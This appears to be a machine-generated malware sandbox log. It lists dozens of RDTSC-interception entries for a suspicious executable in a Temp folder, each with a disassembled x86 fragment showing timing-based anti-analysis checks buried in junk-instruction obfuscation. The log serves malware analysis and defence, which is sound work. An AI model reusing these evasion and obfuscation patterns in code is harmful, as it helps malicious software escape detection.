Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 58408C3 second address: 58408E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FE0C24E61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and ecx, 1Fh 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 58408E0 second address: 58408E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 58408E4 second address: 584091A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 mov si, F401h 0x0000000b pushfd 0x0000000c jmp 00007F3FE0C24E5Eh 0x00000011 adc esi, 354E8918h 0x00000017 jmp 00007F3FE0C24E5Bh 0x0000001c popfd 0x0000001d popad 0x0000001e popad 0x0000001f ror eax, cl 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 584091A second address: 584091E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 584091E second address: 5840939 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FE0C24E67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 5840939 second address: 584093F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 584093F second address: 584098B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FE0C24E5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b leave 0x0000000c jmp 00007F3FE0C24E66h 0x00000011 retn 0004h 0x00000014 nop 0x00000015 mov esi, eax 0x00000017 lea eax, dword ptr [ebp-08h] 0x0000001a xor esi, dword ptr [00ED2014h] 0x00000020 push eax 0x00000021 push eax 0x00000022 push eax 0x00000023 lea eax, dword ptr [ebp-10h] 0x00000026 push eax 0x00000027 call 00007F3FE55D5700h 0x0000002c push FFFFFFFEh 0x0000002e jmp 00007F3FE0C24E60h 0x00000033 pop eax 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F3FE0C24E5Ah 0x0000003d rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 584098B second address: 584098F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 584098F second address: 5840995 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 5840995 second address: 58409C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F3FE11BFDCCh 0x00000009 sbb cl, FFFFFF98h 0x0000000c jmp 00007F3FE11BFDCBh 0x00000011 popfd 0x00000012 movzx eax, bx 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 ret 0x00000019 nop 0x0000001a push eax 0x0000001b call 00007F3FE5B706BAh 0x00000020 mov edi, edi 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 58409C3 second address: 58409DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FE0C24E68h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 58409DF second address: 58409F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3FE11BFDCEh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 58409F1 second address: 58409F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 58409F5 second address: 5840A98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F3FE11BFDCAh 0x00000010 add cx, 4688h 0x00000015 jmp 00007F3FE11BFDCBh 0x0000001a popfd 0x0000001b mov ecx, 527B8EFFh 0x00000020 popad 0x00000021 mov dword ptr [esp], ebp 0x00000024 jmp 00007F3FE11BFDD2h 0x00000029 mov ebp, esp 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007F3FE11BFDCEh 0x00000032 or eax, 1CC11C18h 0x00000038 jmp 00007F3FE11BFDCBh 0x0000003d popfd 0x0000003e mov eax, 5E0B57CFh 0x00000043 popad 0x00000044 pop ebp 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 push edi 0x00000049 pop eax 0x0000004a pushfd 0x0000004b jmp 00007F3FE11BFDD3h 0x00000050 and ah, FFFFFF8Eh 0x00000053 jmp 00007F3FE11BFDD9h 0x00000058 popfd 0x00000059 popad 0x0000005a rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 5840A98 second address: 5840AA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3FE0C24E5Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 57F001C second address: 57F00C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push edx 0x00000007 pushad 0x00000008 push ecx 0x00000009 pushfd 0x0000000a jmp 00007F3FE11BFDD3h 0x0000000f xor esi, 6A2011CEh 0x00000015 jmp 00007F3FE11BFDD9h 0x0000001a popfd 0x0000001b pop esi 0x0000001c mov ebx, 3530D8C4h 0x00000021 popad 0x00000022 mov dword ptr [esp], ebp 0x00000025 pushad 0x00000026 mov dh, 7Ch 0x00000028 call 00007F3FE11BFDD2h 0x0000002d pushfd 0x0000002e jmp 00007F3FE11BFDD2h 0x00000033 sub ah, FFFFFFA8h 0x00000036 jmp 00007F3FE11BFDCBh 0x0000003b popfd 0x0000003c pop eax 0x0000003d popad 0x0000003e mov ebp, esp 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 pushfd 0x00000044 jmp 00007F3FE11BFDD0h 0x00000049 add ah, 00000008h 0x0000004c jmp 00007F3FE11BFDCBh 0x00000051 popfd 0x00000052 mov cx, 697Fh 0x00000056 popad 0x00000057 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 57F00C6 second address: 57F00CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 57F00CB second address: 57F00D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 57F00D1 second address: 57F00E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 and esp, FFFFFFF8h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 57F00E1 second address: 57F00E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 57F00E5 second address: 57F00EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 57F00EB second address: 57F00FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3FE11BFDCCh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 57F00FB second address: 57F0147 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FE0C24E5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c jmp 00007F3FE0C24E66h 0x00000011 push eax 0x00000012 jmp 00007F3FE0C24E5Bh 0x00000017 xchg eax, ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F3FE0C24E65h 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 57F0147 second address: 57F0194 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FE11BFDD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F3FE11BFDD3h 0x00000013 sbb ah, FFFFFFCEh 0x00000016 jmp 00007F3FE11BFDD9h 0x0000001b popfd 0x0000001c mov dl, cl 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 57F0194 second address: 57F01E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FE0C24E5Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F3FE0C24E61h 0x00000011 adc si, 17B6h 0x00000016 jmp 00007F3FE0C24E61h 0x0000001b popfd 0x0000001c mov ch, 41h 0x0000001e popad 0x0000001f xchg eax, ebx 0x00000020 pushad 0x00000021 mov dh, CBh 0x00000023 popad 0x00000024 mov ebx, dword ptr [ebp+10h] 0x00000027 pushad 0x00000028 movsx edx, si 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 57F01E0 second address: 57F01FC instructions: 0x00000000 rdtsc 0x00000002 mov cx, 65A1h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 xchg eax, esi 0x0000000a jmp 00007F3FE11BFDCCh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 57F01FC second address: 57F0203 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ah, B9h 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 57F0203 second address: 57F026C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FE11BFDD4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b jmp 00007F3FE11BFDCEh 0x00000010 push eax 0x00000011 mov cx, di 0x00000014 pop edi 0x00000015 popad 0x00000016 mov esi, dword ptr [ebp+08h] 0x00000019 pushad 0x0000001a pushad 0x0000001b mov ax, DD5Bh 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 mov esi, 723E570Dh 0x00000027 popad 0x00000028 xchg eax, edi 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c movsx ebx, cx 0x0000002f pushfd 0x00000030 jmp 00007F3FE11BFDCEh 0x00000035 and ecx, 672C0458h 0x0000003b jmp 00007F3FE11BFDCBh 0x00000040 popfd 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 57F026C second address: 57F0271 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 57F0271 second address: 57F028A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov esi, ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3FE11BFDCDh 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 57F028A second address: 57F029A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3FE0C24E5Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 57F029A second address: 57F02C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, edi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F3FE11BFDD8h 0x00000011 push eax 0x00000012 pop edi 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 57F02C1 second address: 57F02F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FE0C24E67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3FE0C24E65h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 57F02F5 second address: 57F031F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 4E893BA2h 0x00000008 call 00007F3FE11BFDD3h 0x0000000d pop esi 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 je 00007F4052E5E0C7h 0x00000017 pushad 0x00000018 mov al, bl 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 57E07D4 second address: 57E07FB instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 7DA63FC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c mov esi, 69B225F9h 0x00000011 mov cx, 28B5h 0x00000015 popad 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F3FE0C24E5Eh 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 57E07FB second address: 57E080D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3FE11BFDCEh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 57E080D second address: 57E0811 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 57E0811 second address: 57E0853 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F3FE11BFDD7h 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 mov di, cx 0x00000014 pushad 0x00000015 mov ebx, eax 0x00000017 mov dh, al 0x00000019 popad 0x0000001a popad 0x0000001b and esp, FFFFFFF8h 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F3FE11BFDD0h 0x00000025 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 57E0853 second address: 57E085A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 57E085A second address: 57E090C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushfd 0x0000000a jmp 00007F3FE11BFDD4h 0x0000000f sbb ch, 00000058h 0x00000012 jmp 00007F3FE11BFDCBh 0x00000017 popfd 0x00000018 push esi 0x00000019 push edx 0x0000001a pop eax 0x0000001b pop ebx 0x0000001c popad 0x0000001d mov dword ptr [esp], ebx 0x00000020 pushad 0x00000021 movzx esi, di 0x00000024 mov dx, B2CCh 0x00000028 popad 0x00000029 push ebp 0x0000002a jmp 00007F3FE11BFDD0h 0x0000002f mov dword ptr [esp], esi 0x00000032 pushad 0x00000033 push eax 0x00000034 pushad 0x00000035 popad 0x00000036 pop edi 0x00000037 pushfd 0x00000038 jmp 00007F3FE11BFDD8h 0x0000003d sub al, 00000048h 0x00000040 jmp 00007F3FE11BFDCBh 0x00000045 popfd 0x00000046 popad 0x00000047 mov esi, dword ptr [ebp+08h] 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d pushfd 0x0000004e jmp 00007F3FE11BFDCBh 0x00000053 sub al, FFFFFF8Eh 0x00000056 jmp 00007F3FE11BFDD9h 0x0000005b popfd 0x0000005c mov ebx, eax 0x0000005e popad 0x0000005f rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 57E090C second address: 57E09D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F3FE0C24E63h 0x00000009 sub eax, 234D999Eh 0x0000000f jmp 00007F3FE0C24E69h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F3FE0C24E60h 0x0000001b and ax, B398h 0x00000020 jmp 00007F3FE0C24E5Bh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 sub ebx, ebx 0x0000002b jmp 00007F3FE0C24E5Fh 0x00000030 test esi, esi 0x00000032 jmp 00007F3FE0C24E66h 0x00000037 je 00007F40528CA853h 0x0000003d jmp 00007F3FE0C24E60h 0x00000042 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000049 pushad 0x0000004a mov ecx, 237843EDh 0x0000004f mov edx, ecx 0x00000051 popad 0x00000052 mov ecx, esi 0x00000054 jmp 00007F3FE0C24E64h 0x00000059 je 00007F40528CA82Ch 0x0000005f pushad 0x00000060 push eax 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 57E09D7 second address: 57E0A3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 test byte ptr [77516968h], 00000002h 0x0000000d jmp 00007F3FE11BFDD5h 0x00000012 jne 00007F4052E65783h 0x00000018 pushad 0x00000019 mov edx, esi 0x0000001b mov esi, 10F78CCFh 0x00000020 popad 0x00000021 mov edx, dword ptr [ebp+0Ch] 0x00000024 pushad 0x00000025 mov esi, 106246C7h 0x0000002a pushfd 0x0000002b jmp 00007F3FE11BFDCCh 0x00000030 jmp 00007F3FE11BFDD5h 0x00000035 popfd 0x00000036 popad 0x00000037 xchg eax, ebx 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b mov ecx, edi 0x0000003d mov eax, edx 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 57E0A3E second address: 57E0A44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 57E0A44 second address: 57E0A48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 57E0A48 second address: 57E0A57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 57E0A57 second address: 57E0A5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 57E0A5D second address: 57E0AC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F3FE0C24E69h 0x0000000b or esi, 06A5BC26h 0x00000011 jmp 00007F3FE0C24E61h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebx 0x0000001b jmp 00007F3FE0C24E5Eh 0x00000020 xchg eax, ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 jmp 00007F3FE0C24E68h 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 57E0AC3 second address: 57E0AC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 57E0AC9 second address: 57E0ACD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 57E0ACD second address: 57E0AF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F3FE11BFDD8h 0x0000000e xchg eax, ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 57E0AF5 second address: 57E0AFB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 57E0AFB second address: 57E0B01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 57E0B01 second address: 57E0B05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 57E0BB1 second address: 57E0BB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 57E0BB5 second address: 57E0BBB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 57E0BBB second address: 57E0BEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 pushfd 0x00000007 jmp 00007F3FE11BFDD0h 0x0000000c adc esi, 6254D8C8h 0x00000012 jmp 00007F3FE11BFDCBh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pop ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 57F0BFA second address: 57F0C00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 57F0C00 second address: 57F0C18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FE11BFDCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 57F0C18 second address: 57F0C1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
